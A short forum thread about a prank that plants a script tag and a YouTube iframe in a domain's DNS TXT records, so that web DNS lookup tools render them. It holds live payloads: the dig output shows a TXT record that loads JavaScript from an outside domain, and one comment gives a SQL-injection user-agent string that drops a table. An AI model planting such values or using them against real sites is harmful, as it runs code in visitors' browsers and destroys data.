DNS TXT record XSS

16

DNS TXT record XSS audio video networking security who.is
via journeysquid 3 years ago | cached | 4 comments

4

Arrgh 3 years ago | link

Awesome!

[alex@alex-desktop ~]$ dig txt jamiehankins.co.uk

; <<>> DiG 9.9.4-P2-RedHat-9.9.4-15.P2.fc20 <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61835
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;jamiehankins.co.uk.            IN      TXT

;; ANSWER SECTION:
jamiehankins.co.uk.     240     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.     240     IN      TXT     "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.     240     IN      TXT     "<script src='//peniscorp.com/topkek.js'></script>"
jamiehankins.co.uk.     240     IN      TXT     "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

;; Query time: 26 msec
;; SERVER: 192.168.42.1#53(192.168.42.1)
;; WHEN: Thu Sep 18 14:30:53 PDT 2014
;; MSG SIZE  rcvd: 382

3

journeysquid 3 years ago | link

Looks like it’s been fixed. This one still works:

http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage
3

mikejsavage 3 years ago | link

When I was younger and more naive, I had the idea of logging visits to my website into an SQL database. Naturally, these queries were built with concatenation and executed with mysql_query, and then printed directly to my sweet admin interface.

I eventually realised it was stupid, and ever since I’ve been wondering how many websites would break if i changed my useragent to '; DROP TABLE visits; -- <!--.
1

jm 3 years ago | link

That’s just classic.